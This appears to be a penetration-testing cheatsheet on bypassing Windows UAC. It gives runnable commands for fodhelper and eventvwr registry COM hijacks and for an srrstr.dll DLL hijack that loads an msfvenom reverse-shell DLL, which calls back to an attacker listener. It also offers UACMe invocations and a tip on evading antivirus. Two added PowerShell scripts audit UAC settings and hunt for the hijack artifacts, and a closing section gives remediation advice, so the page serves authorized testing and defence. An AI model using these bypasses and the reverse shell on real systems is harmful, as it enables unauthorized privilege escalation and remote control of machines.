Methodology Checklist
- Confirm user is in Administrators group: `whoami /groups`
- Check UAC level: `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin`
- If UAC enabled (value ≠ 0): attempt bypass
  - fodhelper COM hijack: write payload under `HKCU…\ms-settings\shell\open\command`
  - srrstr.dll hijack: plant x86 DLL in `%USERPROFILE%\AppData\Local\Microsoft\WindowsApps`
- Launch `SystemPropertiesAdvanced.exe` (32-bit) to trigger the srrstr.dll load
- Verify elevated shell: `whoami /groups` → check for Mandatory Label High
Operational Context
Use when: Local admin account obtained but running in a medium integrity context → bypass UAC to achieve high integrity (SYSTEM-equivalent) without a user prompt.
Think Dumber First: eventvwr.exe UAC bypass: set `HKCU\Software\Classes\mscfile\shell\open\command` to your payload → eventvwr.exe calls it at high integrity. Also try the fodhelper.exe bypass. Both are one-liner registry bypasses.
Skip when: Already in a high integrity process (check `whoami /groups` for `Mandatory Label\High Mandatory Level`) → no UAC bypass needed.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` | Check UAC level (EnableLUA, ConsentPromptBehaviorAdmin) |
| `whoami /groups \| find "Mandatory Level"` | Verify current integrity level (Medium vs High) |
| `[System.Environment]::OSVersion.Version` | Get build number → affects which bypass works |
| `cmd /c echo %PATH%` | Confirm WindowsApps path is in %PATH% |
| `icacls "C:\Program Files\WindowsApps"` | Check if WindowsApps dir is writable |
| `msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll -o srrstr.dll` | Generate x86 DLL for srrstr bypass (CRITICAL: must be x86) |
| `copy srrstr.dll "C:\Program Files\WindowsApps\srrstr.dll"` | Place hijack DLL in writable PATH directory |
| `%SystemRoot%\SysWoW64\SystemPropertiesAdvanced.exe` | Trigger auto-elevating binary that loads srrstr.dll |
| UACMe | Tool with 60+ UAC bypass techniques (GitHub: hfiref0x/UACME) |
| eventviper | PowerShell UAC bypass using Event Viewer COM hijack |
Deep Dive & Workflow
UAC Architecture
UAC Levels (reg query → ConsentPromptBehaviorAdmin):
- 0 = No prompt (disabled UAC)
- 1 = Prompt on secure desktop for credentials
- 2 = Prompt on secure desktop for confirmation
- 5 = Prompt for non-Windows binaries (DEFAULT)
EnableLUA:
- EnableLUA = 1 → UAC enabled
- EnableLUA = 0 → UAC disabled → no bypass needed
Integrity Levels:
- Low → sandboxed (browser content)
- Medium → standard user token
- High → elevated/admin token
- System → SYSTEM
Goal: Medium → High (bypass UAC prompt)
Bypass is only needed if: in Administrators group BUT running at medium integrity
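The following audit script is an added example and not part of the original cheatsheet. It reads the same registry values and `whoami /groups` output described above and reports whether the host is in the state the bypasses below depend on (split-token admin at Medium integrity with UAC below Always Notify). The value meanings for 3 and 4 are the remaining documented ConsentPromptBehaviorAdmin settings, added beyond the four listed above; `PromptOnSecureDesktop` is the companion value that distinguishes Always Notify from a plain consent prompt.

```powershell
# Added example (not from the original cheatsheet): audit this host's UAC posture
# and the current token from an ordinary (medium-integrity) PowerShell session.

$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$policy    = Get-ItemProperty -Path $policyKey

# ConsentPromptBehaviorAdmin meanings. 0/1/2/5 are the ones listed above;
# 3 and 4 are the remaining documented values (prompts off the secure desktop).
$consentMeaning = @{
    0 = 'Elevate without prompting'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop'
    3 = 'Prompt for credentials (not on the secure desktop)'
    4 = 'Prompt for consent (not on the secure desktop)'
    5 = 'Prompt for consent for non-Windows binaries (default)'
}

$enableLua = [int]$policy.EnableLUA
$consent   = [int]$policy.ConsentPromptBehaviorAdmin
$secureDsk = [int]$policy.PromptOnSecureDesktop
$build     = [System.Environment]::OSVersion.Version.Build

# whoami /groups lists the Administrators group even when the filtered token marks it
# "used for deny only", and it lists the integrity label on its own line.
$groups      = whoami /groups
$isAdminUser = [bool]($groups | Select-String -SimpleMatch 'BUILTIN\Administrators')
$isHigh      = [bool]($groups | Select-String -SimpleMatch 'High Mandatory Level')
$isMedium    = [bool]($groups | Select-String -SimpleMatch 'Medium Mandatory Level')
$integrity   = if ($isHigh) { 'High' } elseif ($isMedium) { 'Medium' } else { 'Other' }

Write-Host "Build:                      $build"
Write-Host "EnableLUA:                  $enableLua"
Write-Host "ConsentPromptBehaviorAdmin: $consent ($($consentMeaning[$consent]))"
Write-Host "PromptOnSecureDesktop:      $secureDsk"
Write-Host "Admin group member:         $isAdminUser"
Write-Host "Integrity:                  $integrity"

# "Always Notify" is ConsentPromptBehaviorAdmin=2 together with PromptOnSecureDesktop=1.
$alwaysNotify = ($consent -eq 2 -and $secureDsk -eq 1)

if ($enableLua -ne 1) {
    Write-Warning 'UAC is disabled (EnableLUA=0): admin logons get a high-integrity token directly.'
} elseif ($isAdminUser -and $isMedium -and -not $alwaysNotify) {
    Write-Warning 'Split-token admin at Medium integrity with UAC below Always Notify: the auto-elevation bypasses in this page apply to this host.'
} elseif ($alwaysNotify) {
    Write-Host 'UAC is at Always Notify: auto-elevating binaries still prompt, which is the recommended setting.'
} else {
    Write-Host 'Not a split-token admin at Medium integrity: no UAC bypass scenario on this token.'
}
```

Save it as a .ps1 and run it as the account under review; the warnings are the conditions the decision tree later in this page branches on, so the script gives the same answer an operator would reach by hand.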
srrstr.dll DLL Hijack Bypass (Default Windows PATH)
```
# Step 1: Verify you're in Administrators but at medium integrity
whoami /groups | find "Mandatory Level"
# → Medium Mandatory Level → bypass needed
# Step 2: Check if WindowsApps is in PATH (it is by default on Win10)
cmd /c echo %PATH%
# → ...;C:\Program Files\WindowsApps;...
# Step 3: Verify writable
icacls "C:\Program Files\WindowsApps"
# → BUILTIN\Users:(RX) → might be writable with Administrators rights
# Step 4: CRITICAL → generate x86 DLL (SystemPropertiesAdvanced.exe is 32-bit)
msfvenom -p windows/shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f dll -o srrstr.dll
# → x86 (NOT x64) because SysWoW64\SystemPropertiesAdvanced.exe is 32-bit
# Step 5: Copy DLL to WindowsApps
copy srrstr.dll "C:\Program Files\WindowsApps\srrstr.dll"
# Step 6: Start listener on attacker machine
nc -lnvp [LPORT]
# Step 7: Execute auto-elevating binary
C:\Windows\SysWoW64\SystemPropertiesAdvanced.exe
# → Looks for srrstr.dll in PATH before System32
# → Loads our DLL with high integrity (auto-elevates without prompt)
# → Reverse shell at High integrity level
```
Why x86: SystemPropertiesAdvanced.exe in SysWoW64 is a 32-bit binary, so it loads 32-bit DLLs. An x64 DLL will silently fail to load.
Environment Verification Commands
```powershell
# Confirm current integrity before bypass
[System.Security.Principal.WindowsIdentity]::GetCurrent().Claims | Where {$_.Type -like "*groups*"}
# Simpler check
whoami /groups | findstr "Mandatory Level"
# Should show Medium → need bypass
# After bypass → should show High
# Verify admin group
net localgroup administrators | findstr [USERNAME]
```
Alternative UAC Bypasses
```powershell
# fodhelper.exe (registry COM hijack) → reliable on Win10
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd.exe" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
# Cleanup after
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
# eventviper (Event Viewer COM hijack)
# → Creates HKCU\Software\Classes\mscfile\shell\open\command
# → eventvwr.exe is auto-elevating → runs our command elevated
# UACMe (precompiled, many methods)
.\Akagi64.exe 33 cmd.exe # method 33 = fodhelper
.\Akagi64.exe 23 cmd.exe # method 23 = eventvwr
```
UAC Bypass Decision Tree
1. `whoami /groups` → not in Administrators → need full privesc (not just UAC bypass)
2. In Administrators + Medium integrity → check ConsentPromptBehaviorAdmin:
   - 0 → already elevated, no bypass needed
   - 1/2 → credential prompt → need creds (or another bypass method)
   - 5 → DLL hijack / registry COM hijack works
3. Build < 17763 → many more bypasses available
4. Build ≥ 17763 → srrstr, fodhelper, eventviper reliably work
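The following hunting script is an added example, not code from the original cheatsheet, and serves both the srrstr.dll section and the alternative bypasses above. On a host you administer it checks for the two HKCU COM hijack keys those bypasses create (the paths are the ones quoted on this page), for a srrstr.dll planted in a PATH directory other than System32/SysWOW64, and for ACEs that grant write access on WindowsApps. The `-Remediate` switch is an assumption of this script; it performs the same `Remove-Item` cleanup the fodhelper section shows.

```powershell
# Added example (not from the original cheatsheet): hunt for leftovers of the UAC
# bypasses described on this page. Run as the user whose HKCU should be inspected.
param([switch]$Remediate)   # -Remediate is this script's own switch, not a Windows feature

$hijacks = @(
    @{ Binary = 'fodhelper.exe'; ClassRoot = 'HKCU:\Software\Classes\ms-settings'; Key = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command' },
    @{ Binary = 'eventvwr.exe';  ClassRoot = 'HKCU:\Software\Classes\mscfile';     Key = 'HKCU:\Software\Classes\mscfile\shell\open\command' }
)

$findings = @()

# 1. Registry COM hijack keys: neither class normally exists under HKCU at all.
foreach ($h in $hijacks) {
    if (-not (Test-Path -Path $h.Key)) { continue }
    $props = Get-ItemProperty -Path $h.Key
    $hasDelegate = $null -ne $props.PSObject.Properties['DelegateExecute']
    $findings += [pscustomobject]@{
        Type     = 'COM hijack key'
        Target   = $h.Binary
        Location = $h.Key
        Detail   = "command='$($props.'(default)')' DelegateExecute=$hasDelegate"
    }
    if ($Remediate) {
        # Remove the whole hijacked class so the auto-elevating binary resolves it from HKLM again.
        Remove-Item -Path $h.ClassRoot -Recurse -Force
        Write-Host "Removed $($h.ClassRoot)"
    }
}

# 2. DLL planting: srrstr.dll in any PATH directory other than the system directories.
$systemDirs = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64")
foreach ($entry in ($env:PATH -split ';' | Where-Object { $_ })) {
    $d = $entry.TrimEnd('\')
    if ($systemDirs -contains $d) { continue }
    $dll = Join-Path -Path $d -ChildPath 'srrstr.dll'
    if (Test-Path -LiteralPath $dll) {
        $sig = Get-AuthenticodeSignature -FilePath $dll
        $findings += [pscustomobject]@{
            Type     = 'PATH DLL'
            Target   = 'SystemPropertiesAdvanced.exe'
            Location = $dll
            Detail   = "signature=$($sig.Status) size=$((Get-Item -LiteralPath $dll).Length)"
        }
    }
}

# 3. Write access on WindowsApps is what makes the DLL plant possible; list ACEs that grant it.
$appsDir = Join-Path -Path $env:ProgramFiles -ChildPath 'WindowsApps'
try {
    foreach ($ace in (Get-Acl -LiteralPath $appsDir).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and $ace.FileSystemRights -match 'Write|Modify|FullControl') {
            $findings += [pscustomobject]@{
                Type     = 'WindowsApps write ACE'
                Target   = $appsDir
                Location = $ace.IdentityReference.ToString()
                Detail   = "rights=$($ace.FileSystemRights)"
            }
        }
    }
} catch {
    Write-Warning "Could not read ACL of ${appsDir}: $_"
}

if ($findings.Count -eq 0) {
    Write-Host 'No UAC bypass artifacts found.'
} else {
    $findings | Format-Table -AutoSize -Wrap
}
```

Reading the WindowsApps ACL may itself be denied from a medium-integrity session, which is why that step is wrapped in try/catch; the registry and PATH checks need no elevation because the keys live in the user's own hive and the DLL search is a plain file lookup.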
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| eventvwr bypass fails | Registry path already set or blocked | Try fodhelper: HKCU\Software\Classes\ms-settings\shell\open\command with DelegateExecute key |
| UAC set to Always Notify | Highest UAC setting | Most UAC bypasses fail at "Always Notify"; may need physical access or find other privesc |
| Bypass registry writes but payload not executing | Timing issue or wrong path | Ensure payload is full absolute path; test manually first: write to reg, run eventvwr.exe |
| UAC bypass binary flagged by AV | Known bypass executables | Use PowerShell registry-based bypass via HKCU → no binary required |
| Medium integrity even as local admin | Split token (UAC) | Confirmed UAC behavior; all bypass techniques target this exact scenario |
Reporting Trigger
Finding Title: UAC Bypass Elevates Local Admin to High Integrity
Impact: UAC bypass technique converts a medium-integrity local admin token to a high-integrity SYSTEM-equivalent token without prompting the user, enabling credential dumping, persistence installation, and all high-privileged operations that UAC was designed to gate.
Root Cause: Windows UAC configured below maximum (Always Notify). Registry-based UAC bypass techniques exploit auto-elevation of trusted Windows binaries.
Recommendation: Set UAC to the highest level (Always Notify). Enforce admin accounts exclusively in a high-integrity context. Limit local admin assignments. Consider removing local admin from workstation users → use LAPS for IT management and JIT admin elevation.